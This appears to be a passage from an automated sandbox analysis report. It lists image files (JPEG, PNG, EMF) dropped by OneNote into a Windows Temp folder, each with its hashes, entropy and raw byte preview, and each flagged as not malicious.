                                                                                                                                                                                                                  SHA1:CF72A73E1181719B1CC45C2FE0A6B619081E115E
                                                                                                                                                                                                                  SHA-256:7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
                                                                                                                                                                                                                  SHA-512:5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......|]v....D..9.k.w.|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{AD35EECB-937F-4445-BAA0-F3C8A0CD4B89}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:11:38], progressive, precision 8, 577x757, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):84097
                                                                                                                                                                                                                  Entropy (8bit):7.78862495530604
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:cgHTEuD99rHwA5MSadIV2MApVmfJkAKOQ/Z1I7ngpDDyHfKFVITrU:HHjXidIhApV88/jIEmrU
                                                                                                                                                                                                                  MD5:37EED97290E8ECB46A576C84F0810568
                                                                                                                                                                                                                  SHA1:18D9FACB4CFA3CBF63B882CABCF30B203EDF4126
                                                                                                                                                                                                                  SHA-256:140DD943D0F0CFE6AAA98470B7D1A7CB62CA02CB1D8F522DD2AC77433232EF41
                                                                                                                                                                                                                  SHA-512:E0F57314C136211B8253EB2AC0093DED82198E7170D4F97C40D82FD4EC4123D2AAFE3EB4EBC3E7523C4DF4D77619408773871BDE15B6DC6C4049C71D5B9D4222
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H.....hExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:11:38.............................A.......................................................&.(.................................2.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................z.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....b.xH......T..I...S.q.~..../s.R.x.....8.a..vE.5...-.G.A.4...._......$K..d.@NC.q....J.....>e".I.%...I0).R.I$........M3.F .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{ADA2AC5F-7448-491A-BCEB-5CAA2DDBFA47}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):22634
                                                                                                                                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{AEB10311-CFC2-41F7-ABC5-07410C5390E0}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 50 x 556, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                                                                  Entropy (8bit):7.231269197132181
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:6v/7QiFJaY/z+obuqFA4fypjQSbtBK+lcqNGSbb7XTJArRRzN5DjNRkPmu5cCbR2:x0QY7xbjy9pY0JPXLTWroeuCCbX0
                                                                                                                                                                                                                  MD5:B7F74C18002A81A578A4EE60C407A8D3
                                                                                                                                                                                                                  SHA1:70A7D4BB1B3ADF4397D168AD0D81B286F88EBDE0
                                                                                                                                                                                                                  SHA-256:95F59A0433050180D4C0E8858B83363D51BEA6752A8B7CA516A8677854D8F5B6
                                                                                                                                                                                                                  SHA-512:13186A7CDCE80BCA9D2238666D6D7A989FA1887EABFA5D8A9A63EEC304DFD4BE8EFF652205FA56E1D1CEE7D3680AF8C70A952AF73AB3C246400E8D4EBECBDBA9
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...2...,........A....PLTE...................................................................................................................................................................................$.y.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^...0.D_.......cck.....%a...X.a0Y...-..!.G...[....(.r.H.$...1 .zq.4V.e|a.6.X..4..kl.%....=w....6..TN.....{.4..T/.z...../.....3..!~..t.#b..^.....E!.SFb ...-.....^...,..C.!.b...i._c...s.X.w.. lsQH..H.gKc@@...i. ....m...;Ci....@G.; V{..lO..\.R9e$..{.....P...E.+.2.0D.B,..P...56.?......K.6..TN....^z.4..T/.z...../.....3..!~..t.]b........E!.SFb ...-.....^...,..C.!.b...i._c..Y.O...?.9k2.M.?5 .n.P...,...d._..%M?....6....,.1..R.4.a.R.+..U.Q..P...vd..T........j .]@....."..lJ../.90.4...Y. ...9.%...{......Hc%.....i..%M?aG..H....o.q.......4.......X.d9.r..CI.O.5.Ri0?.s\b....w...>/k..4V.)Y....P...vd..T........j .]@....."..lJ../.90..2..MP..l..?....K.X.....IEND.B`.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{AF84D8E1-6E5F-4EA3-9F17-BF84164EF8AC}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4847
                                                                                                                                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{B1081271-C77E-4333-9D8C-BD46F333F699}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):32656
                                                                                                                                                                                                                  Entropy (8bit):3.9517299510231485
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                                                                                                                                  MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                                                                                                                                  SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                                                                                                                                  SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                                                                                                                                  SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{B10C67DE-F667-4033-A70F-6468CFAEF7A8}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):5386
                                                                                                                                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{B139FE5A-5C47-422A-9E4F-76F98DA40506}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16003
                                                                                                                                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{B215BEC3-9DB5-4635-9B1B-4E4C3890AA20}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):7374
                                                                                                                                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{B21C4345-39FA-4D35-8189-A0C2DA6298BB}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):7374
                                                                                                                                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{B2E68442-2306-4244-AF44-64C5EB0BA0F7}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4847
                                                                                                                                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{B42DC2AD-0B13-4C20-885A-EAEA549A5761}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{B44F7697-2AA3-44DA-898A-85FCDD5E7EC4}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):22634
                                                                                                                                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                                  Malicious:false
